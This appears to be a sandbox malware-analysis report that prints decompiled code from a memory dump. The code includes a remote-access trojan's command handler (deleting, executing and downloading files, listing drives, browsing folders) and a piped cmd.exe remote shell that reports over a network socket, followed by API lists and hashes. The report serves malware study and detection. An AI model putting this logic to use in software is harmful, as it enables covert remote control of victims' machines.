                                                                      				void* _t599;
                                                                      				void* _t600;
                                                                      				void* _t601;
                                                                      				void* _t617;
                                                                      				void* _t618;
                                                                      				void* _t619;
                                                                      				void* _t621;
                                                                      				void* _t623;
                                                                      				void* _t632;
                                                                      
                                                                      				_t631 = __eflags;
                                                                      				_t539 = __edx;
                                                                      				_push(_t342);
                                                                      				_t560 = _a4;
                                                                      				E004020B6(_t342,  &_v180, __edx, __eflags, _t560 + 0xc);
                                                                      				SetEvent( *(_t560 + 0x24));
                                                                      				_t561 =  *((intOrPtr*)(E00401F6B( &_v184)));
                                                                      				E00404162( &_v184,  &_v160, 4, 0xffffffff);
                                                                      				_t584 = (_t581 & 0xfffffff8) - 0x104;
                                                                      				E004020B6(_t342, _t584, _t539, _t631, 0x46e260);
                                                                      				_t585 = _t584 - 0x18;
                                                                      				E004020B6(_t342, _t585, _t539, _t631,  &_v176);
                                                                      				E0041851D( &_v312, _t539);
                                                                      				_t586 = _t585 + 0x30;
                                                                      				_t632 = _t561 - 0x8c;
                                                                      				if(_t632 > 0) {
                                                                      					_t562 = _t561 - 0x8d;
                                                                      					__eflags = _t562;
                                                                      					if(__eflags == 0) {
                                                                      						E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      						E0040413E(0,  &_v216, _t539, _t580, E00401F6B(E00401E25( &_v296, _t539, _t580, __eflags, 1)));
                                                                      						E004076F1( &_v300,  &_v252, 0, E0040770B( &_v292,  &_v216,  &_v216) + 1);
                                                                      						_t158 = E00401EC4(E004079E2( &_v288,  &_v264, _t580,  &_v240));
                                                                      						_t160 = E00438AE0(E00401EC4( &_v312), _t158);
                                                                      						asm("sbb bl, bl");
                                                                      						E00401EC9();
                                                                      						_t346 =  ~_t160 + 1;
                                                                      						__eflags =  ~_t160 + 1;
                                                                      						if( ~_t160 + 1 == 0) {
                                                                      							_t539 = E004052F5( &_v252, "Unable to rename file!", _t580, 0x46e260);
                                                                      							E0040793B(_t346, _t586 - 0x18, _t162, 0x46e260, _t580, __eflags, "16");
                                                                      							_push(0x59);
                                                                      							E00404A78(0x46e328, _t162, __eflags);
                                                                      							E00401F98();
                                                                      						} else {
                                                                      							_t539 =  &_v228;
                                                                      							E004078F9(_t586 - 0x18,  &_v228, _t580, "*");
                                                                      							E0040620E();
                                                                      						}
                                                                      						E00401EC9();
                                                                      						L41:
                                                                      						E00401EC9();
                                                                      						L42:
                                                                      						E00401EC9();
                                                                      						L43:
                                                                      						E00401E4D( &_v308, _t539);
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						return 0;
                                                                      					}
                                                                      					_t565 = _t562 - 1;
                                                                      					__eflags = _t565;
                                                                      					if(__eflags == 0) {
                                                                      						E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      						_t179 = E00401F6B(E00401E25( &_v296, _t539, _t580, __eflags, 1));
                                                                      						_t539 =  &_v288;
                                                                      						CreateDirectoryW(E00401EC4(E004078F9( &_v264,  &_v288, _t580, _t179)), 0);
                                                                      						E00401EC9();
                                                                      						E0040320F(0x2a);
                                                                      						E0040773A(0, _t586 - 0x18,  &_v288, __eflags,  &_v292);
                                                                      						L26:
                                                                      						E0040620E();
                                                                      						goto L42;
                                                                      					}
                                                                      					_t566 = _t565 - 3;
                                                                      					__eflags = _t566;
                                                                      					if(__eflags == 0) {
                                                                      						_t190 = StrToIntA(E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      						_t539 = E00401F6B(E00401E25( &_v292, _t539, _t580, __eflags, 1));
                                                                      						E00418F13(_t190, _t192);
                                                                      					} else {
                                                                      						_t568 = _t566 - 0x24;
                                                                      						__eflags = _t568;
                                                                      						if(__eflags == 0) {
                                                                      							 *0x46dae4 = 0;
                                                                      							_t194 = E00401E25( &_v288, _t539, _t580, __eflags, 2);
                                                                      							_t592 = _t586 - 0x18;
                                                                      							E004020B6(0, _t592, _t539, __eflags, _t194);
                                                                      							_t593 = _t592 - 0x18;
                                                                      							E0040413E(0, _t593, _t539, _t580, 0x4610ec);
                                                                      							_t198 = E00401F6B(E00401E25( &_v300, _t539, _t580, __eflags, 0));
                                                                      							_t594 = _t593 - 0x18;
                                                                      							E0040413E(0, _t594, _t539, _t580, _t198);
                                                                      							E00401E25( &_v308, _t539, _t580, __eflags, 1);
                                                                      							E00406EEF(E00418513(__eflags), _t539, __eflags);
                                                                      							_t595 = _t594 + 0x48;
                                                                      							__eflags =  *0x46dae4; // 0x0
                                                                      							if(__eflags == 0) {
                                                                      								Sleep(0x7d0);
                                                                      								E004020B6(0, _t595 - 0x18, _t539, __eflags, E00401E25( &_v288, _t539, _t580, __eflags, 0));
                                                                      								_push(0xb9);
                                                                      								E00404A78(0x46e328, _t539, __eflags);
                                                                      							}
                                                                      						} else {
                                                                      							__eflags = _t568 == 3;
                                                                      							if(_t568 == 3) {
                                                                      								 *0x46dae4 = 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L43;
                                                                      				}
                                                                      				if(_t632 == 0) {
                                                                      					E0040413E(_t342,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      					_t210 = GetFileAttributesW(E00401EC4( &_v284));
                                                                      					__eflags = _t210 & 0x00000010;
                                                                      					if((_t210 & 0x00000010) == 0) {
                                                                      						_t212 = DeleteFileW(E00401EC4( &_v284));
                                                                      					} else {
                                                                      						_t212 = E004187B1(E00401EC4( &_v284), _t539);
                                                                      					}
                                                                      					__eflags = _t212;
                                                                      					__eflags = _t212 & 0xffffff00 | _t212 != 0x00000000;
                                                                      					if(__eflags == 0) {
                                                                      						_t597 = _t586 - 0x18;
                                                                      						E00418445(_t342, _t597,  &_v276);
                                                                      						_push(0x55);
                                                                      						E00404A78(0x46e328,  &_v276, __eflags);
                                                                      						_t216 = E004183E5( &_v280,  &_v304);
                                                                      						_t598 = _t597 - 0x18;
                                                                      						_t544 = "Unable to delete: ";
                                                                      						E004052D4(_t342, _t598, "Unable to delete: ", _t580, __eflags, _t216);
                                                                      						_t599 = _t598 - 0x14;
                                                                      						_t426 = _t599;
                                                                      						_push("E");
                                                                      					} else {
                                                                      						_t231 = E004183E5( &_v252,  &_v276);
                                                                      						_t601 = _t586 - 0x18;
                                                                      						_t544 = "Deleted file: ";
                                                                      						E004052D4(_t342, _t601, "Deleted file: ", _t580, __eflags, _t231);
                                                                      						_t599 = _t601 - 0x14;
                                                                      						_t426 = _t599;
                                                                      						_push("i");
                                                                      					}
                                                                      					E00402053(_t342, _t426, _t544, _t580);
                                                                      					E00417D02(_t342, 0x46e260);
                                                                      					_t600 = _t599 + 0x30;
                                                                      					E00401F98();
                                                                      					_t221 = E00401E25( &_v312, _t544, _t580, __eflags, 1);
                                                                      					_t539 = "1";
                                                                      					_t429 = _t221;
                                                                      					_t222 = E00405ADC("1");
                                                                      					__eflags = _t222;
                                                                      					if(_t222 == 0) {
                                                                      						goto L42;
                                                                      					} else {
                                                                      						__eflags = E0040770B( &_v296, _t429, _t429) + 1;
                                                                      						E00407727(E0040770B( &_v296, _t429, _t429) + 1);
                                                                      						_push(0x2a);
                                                                      						_t539 =  &_v308;
                                                                      						E00401ED3( &_v308,  &_v308, _t561, E00402F32(_t342,  &_v284,  &_v308, _t580));
                                                                      						E00401EC9();
                                                                      						E0040413E(_t342, _t600 - 0x18,  &_v308, _t580, E00401EC4( &_v312));
                                                                      						goto L26;
                                                                      					}
                                                                      				}
                                                                      				_t570 = _t561 - 0x61;
                                                                      				if(_t570 == 0) {
                                                                      					E0040413E(_t342, _t586 - 0x18, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      					_t237 = E00401E25( &_v296, _t539, _t580, __eflags, 2);
                                                                      					_t238 = E00401E25( &_v300, _t539, _t580, __eflags, 1);
                                                                      					_t539 = _t237;
                                                                      					E004178D4(_t238, _t237);
                                                                      					goto L43;
                                                                      				}
                                                                      				_t572 = _t570 - 0x26;
                                                                      				if(_t572 == 0) {
                                                                      					GetLogicalDriveStringsA(0x64,  &_v132);
                                                                      					E00402077(_t342,  &_v276, _t539, _t580, __eflags,  &_v132, 0x64);
                                                                      					__eflags = E00407781( &_v284, 0x4611d8, 0, 2) + 1;
                                                                      					E00401F5D(E00407781( &_v284, 0x4611d8, 0, 2) + 1);
                                                                      					E004020B6(_t342, _t586 - 0x18, _t539, E00407781( &_v284, 0x4611d8, 0, 2) + 1,  &_v300);
                                                                      					_t249 = E0040647F(_t342,  &_v232, _t539);
                                                                      					_t539 = E00402EF1( &_v280,  &_v304, _t580, 0x46e260);
                                                                      					E00402E61(_t586 - 0x18, _t250, _t249);
                                                                      					_push(0x51);
                                                                      					E00404A78(0x46e328, _t250, __eflags);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					L16:
                                                                      					E00401F98();
                                                                      					goto L43;
                                                                      				}
                                                                      				_t574 = _t572 - 1;
                                                                      				if(_t574 == 0) {
                                                                      					E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      					E0040773A(0, _t586 - 0x18, _t539, __eflags,  &_v284);
                                                                      					E0040620E();
                                                                      					_t266 = E004183E5( &_v276, E004076F1( &_v288,  &_v216, 0, E0040243C() - 2));
                                                                      					_t539 = "Browsing directory: ";
                                                                      					E004052D4(0, _t586 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t580, __eflags, _t266);
                                                                      					E00402053(0, _t586 - 0x18 + 0x18 - 4, "Browsing directory: ", _t580, "i");
                                                                      					E00417D02(0, 0x46e260);
                                                                      					E00401F98();
                                                                      					goto L41;
                                                                      				}
                                                                      				_t575 = _t574 - 1;
                                                                      				if(_t575 == 0) {
                                                                      					E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
                                                                      					ShellExecuteW(0, L"open", E00401EC4( &_v284), 0, 0, 1);
                                                                      					_t276 = E004183E5( &_v260,  &_v284);
                                                                      					_t539 = "Executing file: ";
                                                                      					E004052D4(0, _t586 - 0x18, "Executing file: ", _t580, __eflags, _t276);
                                                                      					E00402053(0, _t586 - 4, "Executing file: ", _t580, "i");
                                                                      					E00417D02(0, 0x46e260);
                                                                      					E00401F98();
                                                                      					goto L42;
                                                                      				}
                                                                      				_t576 = _t575 - 1;
                                                                      				if(_t576 == 0) {
                                                                      					 *0x46dae4 = 0;
                                                                      					E004020B6(0, _t586 - 0x18, _t539, __eflags, E00401E25( &_v288, _t539, _t580, __eflags, 2));
                                                                      					E0040413E(0, _t586, _t539, _t580, 0x4610ec);
                                                                      					E0040413E(0, _t586 - 0xffffffffffffffe8, _t539, _t580, E00401F6B(E00401E25( &_v300, _t539, _t580, __eflags, 0)));
                                                                      					E00401E25( &_v308, _t539, _t580, __eflags, 1);
                                                                      					E00407168(E00418513(__eflags), _t539);
                                                                      					goto L43;
                                                                      				}
                                                                      				_t577 = _t576 != 1;
                                                                      				_t638 = _t576 != 1;
                                                                      				if(_t576 != 1) {
                                                                      					goto L43;
                                                                      				} else {
                                                                      					 *0x46dae4 = 0;
                                                                      					E0040209F(0,  &_v252);
                                                                      					E004046B7( &_v132, _t580, 1);
                                                                      					E0040489F( &_v136, _t577,  &_v132);
                                                                      					_t293 = E00401E25( &_v296, _t539, _t580, _t638, 3);
                                                                      					_t617 = _t586 - 0x18;
                                                                      					_t294 = E00401E25( &_v300, _t539, _t580, _t638, 2);
                                                                      					E00402ED0(0, _t617, E00402ED0(0,  &_v224, E00402ED0(0,  &_v248, E00402EF1( &_v296, E00401E25( &_v304, _t539, _t580, _t638, 1), _t580, 0x46e260), _t580, _t638, _t294), _t580, _t638, 0x46e260), _t580, _t638, _t293);
                                                                      					_push(0x56);
                                                                      					E00404A78( &_v152, _t298, _t638);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E0040413E(0,  &_v280, _t298, _t580, E00401F6B(E00401E25( &_v336, _t298, _t580, _t638, 0)));
                                                                      					_t307 = E004183E5( &_v260,  &_v284);
                                                                      					_t618 = _t617 - 0x18;
                                                                      					_t553 = "Downloading file: ";
                                                                      					E004052D4(0, _t618, _t553, _t580, _t638, _t307);
                                                                      					_t619 = _t618 - 0x14;
                                                                      					_t579 = "i";
                                                                      					E00402053(0, _t619, _t553, _t580, "i");
                                                                      					E00417D02(0, 0x46e260);
                                                                      					E00401F98();
                                                                      					E00401EC9();
                                                                      					_t314 = E00401F6B(E00401E25( &_v348, _t553, _t580, _t638, 0));
                                                                      					_t621 = _t619 + 0x30 - 0x18;
                                                                      					E0040413E(0, _t621, _t553, _t580, _t314);
                                                                      					_t318 = E00438A30(_t316, E00401F6B(E00401E25( &_v356, _t553, _t580, _t638, 4)), 0, 0xa);
                                                                      					_push(_t553);
                                                                      					_push(_t318);
                                                                      					_t319 = E00406335( &_v204, _t638);
                                                                      					_t623 = _t621 + 0x2c;
                                                                      					_push(0);
                                                                      					_t639 = _t319;
                                                                      					if(_t319 == 0) {
                                                                      						E0040413E(0,  &_v252, _t553, _t580, E00401F6B(E00401E25( &_v360, _t553, _t580, __eflags)));
                                                                      						_t323 = E004183E5( &_v232,  &_v256);
                                                                      						_t539 = "Failed to download file: ";
                                                                      						E004052D4(0, _t623 - 0x18, "Failed to download file: ", _t580, __eflags, _t323);
                                                                      						E00402053(0, _t623 - 4, "Failed to download file: ", _t580, "E");
                                                                      						E00417D02(0, 0x46e260);
                                                                      						E00401F98();
                                                                      						E00401EC9();
                                                                      					} else {
                                                                      						E0040413E(0,  &_v252, _t553, _t580, E00401F6B(E00401E25( &_v360, _t553, _t580, _t639)));
                                                                      						_t334 = E004183E5( &_v232,  &_v256);
                                                                      						_t539 = "Downloaded file: ";
                                                                      						E004052D4(0, _t623 - 0x18, "Downloaded file: ", _t580, _t639, _t334);
                                                                      						E00402053(0, _t623 - 4, "Downloaded file: ", _t580, "i");
                                                                      						E00417D02(0, 0x46e260);
                                                                      						E00401F98();
                                                                      						E00401EC9();
                                                                      						E00402053(0, _t623 - 4 + 0x30 - 0x18, "Downloaded file: ", _t580, 0x461084);
                                                                      						_push(0x58);
                                                                      						E00404A78( &_v168, "Downloaded file: ", _t639);
                                                                      					}
                                                                      					E00404DFD(_t539);
                                                                      					E00404EB9(0,  &_v152, _t539, _t579);
                                                                      					goto L16;
                                                                      				}
                                                                      			}
                                                                      0x00406571
                                                                      0x00406571
                                                                      0x00406581
                                                                      0x00406583
                                                                      0x0040658b
                                                                      0x00406593
                                                                      0x004065ad
                                                                      0x004065b7
                                                                      0x004065bc
                                                                      0x004065c7
                                                                      0x004065cc
                                                                      0x004065d9
                                                                      0x004065e2
                                                                      0x004065ec
                                                                      0x004065ef
                                                                      0x004065f1
                                                                      0x00406c32
                                                                      0x00406c32
                                                                      0x00406c38
                                                                      0x00406dd7
                                                                      0x00406df3
                                                                      0x00406e0f
                                                                      0x00406e29
                                                                      0x00406e39
                                                                      0x00406e48
                                                                      0x00406e4a
                                                                      0x00406e4f
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e8c
                                                                      0x00406e90
                                                                      0x00406e96
                                                                      0x00406e9d
                                                                      0x00406ea6
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e62
                                                                      0x00406e68
                                                                      0x00406e6d
                                                                      0x00406eaf
                                                                      0x00406eb4
                                                                      0x00406eb8
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec6
                                                                      0x00406eca
                                                                      0x00406ed6
                                                                      0x00406edf
                                                                      0x00406eec
                                                                      0x00406eec
                                                                      0x00406c3e
                                                                      0x00406c3e
                                                                      0x00406c41

APIs
• SetEvent.KERNEL32(?,?), ref: 00406593
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406928
  • Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7
  • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
  • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
  • Part of subcall function 00406335: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,0046E260,00460F88,?,00000000,0040678D,00000000), ref: 00406397
  • Part of subcall function 00406335: WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 004063DF
  • Part of subcall function 00406335: CloseHandle.KERNEL32(00000000,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 0040641F
  • Part of subcall function 00406335: MoveFileW.KERNEL32(00000000,00000000), ref: 0040643C
• GetLogicalDriveStringsA.KERNEL32 ref: 00406A0A
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406B0C
• DeleteFileW.KERNEL32(00000000), ref: 00406B2E
• StrToIntA.SHLWAPI(00000000,00000000), ref: 00406D22
  • Part of subcall function 00418F13: SystemParametersInfoW.USER32 ref: 00419008
• Sleep.KERNEL32(000007D0), ref: 00406CE0
  • Part of subcall function 00404A78: WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
  • Part of subcall function 00404A78: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: File$Event$AttributesCloseCreateDeleteDriveExecuteHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWriteconnectsend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
• API String ID: 2160989192-1507758755
• Opcode ID: df5979ebcb57634c07c850389a01030b96332b33cf773dd07da2beca838ed320
• Instruction ID: 8841d6d8737b4348805b15b28e4d29613fed3da607a04bb90e6be04e50a28c43
• Opcode Fuzzy Hash: df5979ebcb57634c07c850389a01030b96332b33cf773dd07da2beca838ed320
• Instruction Fuzzy Hash: 3A229071A083005BC614FB76C9679AF77A8AF91308F40093FF542671E2EE7C9949869B
Uniqueness

Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E00405671() {
                                                                      				char _v4;
                                                                      				void* _v16;
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				long _v56;
                                                                      				long _v60;
                                                                      				CHAR* _v64;
                                                                      				intOrPtr _v68;
                                                                      				void* _v72;
                                                                      				char _v76;
                                                                      				CHAR* _v84;
                                                                      				long _v92;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t52;
                                                                      				void* _t56;
                                                                      				void* _t66;
                                                                      				void* _t70;
                                                                      				void* _t79;
                                                                      				CHAR* _t80;
                                                                      				CHAR* _t97;
                                                                      				void* _t105;
                                                                      				intOrPtr _t135;
                                                                      				signed int _t138;
                                                                      				signed int _t139;
                                                                      				long _t141;
                                                                      				char* _t143;
                                                                      				void* _t149;
                                                                      				void* _t155;
                                                                      				void* _t161;
                                                                      				void* _t168;
                                                                      
                                                                      				_t149 =  &_v68;
                                                                      				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                      				_t139 = _t138 | 0xffffffff;
                                                                      				_t97 = 0;
                                                                      				if( *0x46ff48 >  *((intOrPtr*)(_t135 + 4))) {
                                                                      					E00430D17(0x46ff48);
                                                                      					_t152 =  *0x46ff48 - _t139;
                                                                      					if( *0x46ff48 == _t139) {
                                                                      						E004046B7(0x46fea8, 0x46ff48, 0);
                                                                      						E004310BE(_t152, E00453D07);
                                                                      						E00430CD8(_t139, 0x46ff48);
                                                                      					}
                                                                      				}
                                                                      				if( *0x46ff28 >  *((intOrPtr*)(_t135 + 4))) {
                                                                      					E00430D17(0x46ff28);
                                                                      					_t154 =  *0x46ff28 - _t139;
                                                                      					if( *0x46ff28 == _t139) {
                                                                      						E0040209F(_t97, 0x46ff50);
                                                                      						E004310BE(_t154, E00453CFD);
                                                                      						E00430CD8(_t139, 0x46ff28);
                                                                      					}
                                                                      				}
                                                                      				_t98 =  &_v52;
                                                                      				E0040209F(_t97,  &_v52);
                                                                      				_t143 = 0x46e310;
                                                                      				_t136 = CloseHandle;
                                                                      				_v64 = _t97;
                                                                      				_t155 =  *0x46dad6 - _t97; // 0x0
                                                                      				if(_t155 != 0) {
                                                                      					L12:
                                                                      					_v60 = _t97;
                                                                      					PeekNamedPipe( *0x46ff30, _t97, _t97, _t97,  &_v60, _t97);
                                                                      					if(_v60 <= _t97) {
                                                                      						_t149 = _t149 - 0x18;
                                                                      						E00402053(_t97, _t149, _t134, _t143, 0x461084);
                                                                      						_push(0x62);
                                                                      						_t139 = E00404A78(0x46fea8, _t134, __eflags);
                                                                      						goto L21;
                                                                      					}
                                                                      					_push(_v60);
                                                                      					_t56 = E00438691(_t98);
                                                                      					_t144 = _t56;
                                                                      					ReadFile( *0x46ff30, _t56, _v60,  &_v56, _t97);
                                                                      					if(_v56 <= _t97) {
                                                                      						L19:
                                                                      						L0043868C(_t144);
                                                                      						_t143 = 0x46e310;
                                                                      						goto L21;
                                                                      					}
                                                                      					if(_v64 <= _t97) {
                                                                      						L17:
                                                                      						E00402053(_t97,  &_v28, _t134, _t144, _t144);
                                                                      						_t149 = _t149 - 0x18;
                                                                      						_t105 = _t149;
                                                                      						_push(_v60);
                                                                      						_push(_t97);
                                                                      						L18:
                                                                      						E00405A82(_t97, _t105, _t134, _t144, _t165);
                                                                      						_t139 = E00404A78(0x46fea8, _t134, _t165, 0x62,  &_v28);
                                                                      						E00401F98();
                                                                      						goto L19;
                                                                      					}
                                                                      					_t66 = E004386A0(_t144, E00401F6B( &_v52), _v64);
                                                                      					_t149 = _t149 + 0xc;
                                                                      					_t165 = _t66;
                                                                      					if(_t66 != 0) {
                                                                      						goto L17;
                                                                      					}
                                                                      					E00402053(_t97,  &_v28, _t134, _t144, _t144);
                                                                      					_t149 = _t149 - 0x18;
                                                                      					_t105 = _t149;
                                                                      					_push(_v60 - _v68);
                                                                      					_push(_v68);
                                                                      					goto L18;
                                                                      				} else {
                                                                      					_t134 = "cmd.exe";
                                                                      					_t98 = 0x46e310;
                                                                      					_t70 = E00405ADC("cmd.exe");
                                                                      					_t156 = _t70;
                                                                      					if(_t70 == 0) {
                                                                      						L11:
                                                                      						_t161 =  *0x46dad6 - _t97; // 0x0
                                                                      						if(_t161 == 0) {
                                                                      							L26:
                                                                      							E00404DFD(_t134);
                                                                      							CloseHandle( *0x46ff30);
                                                                      							CloseHandle( *0x46ff4c);
                                                                      							 *0x46dad6 = _t97;
                                                                      							_t97 = 1;
                                                                      							L27:
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							return _t97;
                                                                      						} else {
                                                                      							goto L12;
                                                                      						}
                                                                      						do {
                                                                      							goto L12;
                                                                      							L21:
                                                                      							_t38 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
                                                                      							_t98 = _t143;
                                                                      							 *0x46dad7 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
                                                                      							if(E0040243C() == 0) {
                                                                      								_v84 = _t97;
                                                                      							} else {
                                                                      								L00405354(_t97, _t143, _t134, _t136, _t143, "\n");
                                                                      								E00401F80( &_v76, _t143);
                                                                      								_t52 = E0040243C();
                                                                      								WriteFile( *0x46ff2c, E00401F6B(_t143), _t52,  &_v92, _t97);
                                                                      								_t98 = _t143;
                                                                      								L00405A7D(_t97, _t143, _t134, 0x461084);
                                                                      							}
                                                                      							Sleep(0x64);
                                                                      							_t168 =  *0x46dad7 - _t97; // 0x0
                                                                      						} while (_t168 != 0);
                                                                      						TerminateProcess(0x46ff34->hProcess, _t97);
                                                                      						CloseHandle( *0x46ff38);
                                                                      						CloseHandle( *0x46ff34);
                                                                      						goto L26;
                                                                      					}
                                                                      					L00405A7D(_t97, 0x46ff50, "cmd.exe", E00438A1A(_t97, _t156, "SystemDrive"));
                                                                      					L00405354(_t97, 0x46ff50, "cmd.exe", CloseHandle, 0x46ff50, "\\");
                                                                      					0x46fe50->nLength = 0xc;
                                                                      					 *0x46fe58 = 1;
                                                                      					 *0x46fe54 = _t97;
                                                                      					if(CreatePipe(0x46ff44, 0x46ff2c, 0x46fe50, _t97) == 0 || CreatePipe(0x46ff30, 0x46ff4c, 0x46fe50, _t97) == 0) {
                                                                      						goto L27;
                                                                      					} else {
                                                                      						_t141 = 0x44;
                                                                      						E004337A0(CloseHandle, 0x46fe60, _t97, CreatePipe);
                                                                      						0x46fe60->cb = _t141;
                                                                      						 *0x46fe8c = 0x101;
                                                                      						 *0x46fe90 = 0;
                                                                      						 *0x46fe98 =  *0x46ff44;
                                                                      						_t79 =  *0x46ff4c;
                                                                      						 *0x46fe9c = _t79;
                                                                      						 *0x46fea0 = _t79;
                                                                      						_t80 = E00401F6B(0x46ff50);
                                                                      						_t143 = 0x46e310;
                                                                      						 *0x46dad6 = CreateProcessA(_t97, E00401F6B(0x46e310), _t97, _t97, 1, _t97, _t97, _t80, 0x46fe60, 0x46ff34) != 0;
                                                                      						L00405A7D(_t97, 0x46e310, _t134, 0x461084);
                                                                      						 *0x46dad7 = 1;
                                                                      						E00404804(0x46fea8);
                                                                      						E0040489F(0x46fea8, 0x46fea8, 0x46fea8);
                                                                      						_t149 = _t149 + 0xc - 0x18;
                                                                      						E004020B6(_t97, _t149, _t134,  *0x46dad6,  &_v4);
                                                                      						_push(0x93);
                                                                      						_t98 = 0x46fea8;
                                                                      						_t139 = E00404A78(0x46fea8, _t134,  *0x46dad6);
                                                                      						Sleep(0x12c);
                                                                      						goto L11;
                                                                      					}
                                                                      				}
			}

                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 004056BD
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • __Init_thread_footer.LIBCMT ref: 004056FA
                                                                      • CreatePipe.KERNEL32(0046FF44,0046FF2C,0046FE50,00000000,0046109C,00000000), ref: 0040578D
                                                                      • CreatePipe.KERNEL32(0046FF30,0046FF4C,0046FE50,00000000), ref: 004057A3
                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046FE60,0046FF34), ref: 00405816
                                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040586E
                                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405893
                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C0
                                                                        • Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4
                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046E310,004610A0,00000062,00461084), ref: 004059BB
                                                                      • Sleep.KERNEL32(00000064,00000062,00461084), ref: 004059D5
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004059EE
                                                                      • CloseHandle.KERNEL32 ref: 004059FA
                                                                      • CloseHandle.KERNEL32 ref: 00405A02
                                                                      • CloseHandle.KERNEL32 ref: 00405A14
                                                                      • CloseHandle.KERNEL32 ref: 00405A1C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                      • String ID: SystemDrive$cmd.exe
                                                                      • API String ID: 2994406822-3633465311
                                                                      • Opcode ID: a00e173401327d9a7b09bbfe1053553a7d021985a97f3a056504690394dec93a
                                                                      • Instruction ID: cb4e1e58c913fca3d6a1af9edfb165cf85d8e051cbecda12000959ddded38d9f
                                                                      • Opcode Fuzzy Hash: a00e173401327d9a7b09bbfe1053553a7d021985a97f3a056504690394dec93a
                                                                      • Instruction Fuzzy Hash: AA91C671608344AFC704BB65EC41A2F3AA9EB45358F40043FF585A62E3EBBD5C488B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0040FC77(void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v36;
                                                                      				void* _v40;
                                                                      				char _v56;
                                                                      				void* _v64;
                                                                      				char _v76;
                                                                      				char _v84;
                                                                      				void* _v88;
                                                                      				char _v100;
                                                                      				char _v104;
                                                                      				void* _v108;
                                                                      				char _v124;
                                                                      				char _v128;
                                                                      				long _v132;
                                                                      				char _v148;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t26;
                                                                      				void* _t29;
                                                                      				void* _t35;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				void* _t61;
                                                                      				void* _t78;
                                                                      				void* _t107;
                                                                      				long _t112;
                                                                      				long _t141;
                                                                      				void* _t142;
                                                                      				CHAR* _t143;
                                                                      				void* _t145;
                                                                      				void* _t147;
                                                                      				signed int _t148;
                                                                      				void* _t150;
                                                                      				void* _t156;
                                                                      
